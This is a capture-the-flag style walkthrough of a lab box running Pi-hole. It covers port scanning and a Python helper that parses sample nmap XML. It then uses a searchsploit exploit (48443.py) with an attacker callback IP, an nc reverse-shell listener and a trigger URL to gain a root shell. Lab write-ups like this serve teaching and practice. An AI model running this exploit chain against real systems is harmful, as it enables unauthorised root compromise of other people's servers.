Pie
nmap
I prefer to use rustscan with additional nmap flags as it's faster, but you can use plain nmap.
mkdir nmap
sudo rustscan -a 172.31.1.26 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
We can see that port 80 is open; let's quickly check whether it's a web server.
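The -oA flag in the scan above also writes nmap/all-ports-service-scan.xml. This added example (not from the original writeup) parses that nmap XML format to list the open ports and pick out the web services worth checking in a browser; the scan result it uses is a constructed sample, not the real output from the box.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap XML (the .xml file -oA writes); the values are made up.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -oA nmap/all-ports-service-scan 172.31.1.26">
  <host>
    <status state="up"/>
    <address addr="172.31.1.26" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53">
        <state state="open" reason="syn-ack"/>
        <service name="domain" product="dnsmasq"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="lighttpd" version="1.4.53"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Service names nmap assigns to things worth opening in a browser.
WEB_SERVICES = {"http", "https", "http-alt", "http-proxy"}

def parse_open_ports(xml_text):
    """Return (host, port, proto, service, banner) for every open port."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # skip closed/filtered ports
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            banner = " ".join(filter(None, (attrs.get("product"), attrs.get("version"))))
            results.append((addr, int(port.get("portid")), port.get("protocol"),
                            attrs.get("name", ""), banner))
    return results

def web_ports(results):
    """Keep only the open ports nmap identified as web services."""
    return [r for r in results if r[3] in WEB_SERVICES]

if __name__ == "__main__":
    for host, port, proto, name, banner in web_ports(parse_open_ports(SAMPLE_XML)):
        print(f"{host}:{port}/{proto} {name} {banner}".rstrip())
```

Point parse_open_ports at the contents of your own .xml file to get the same listing for a real scan.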

Pi-hole
It is indeed a web server, and it is running Pi-hole.

Navigate to /admin and you will see the Pi-hole version in the footer.

Exploitation
Search for this Pi-hole version on searchsploit:
searchsploit pi hole
Let's try the 6th result, since it sounds more interesting than the others.

First, let's mirror the exploit to our current working directory:
searchsploit -m linux/webapps/48443.py
As per the author, we need the following to execute the exploit.

Let's run the exploit:
python 48443.py 9nm7ajvv8ncaqidomb5arjchov http://172.31.1.26/ 10.10.0.41 80
Right after the script finishes, start a reverse shell listener:
nc -lnvp 80
To trigger the shell, navigate to /admin/scripts/pi-hole/php/fun.php.

Then you should receive your root shell. :D
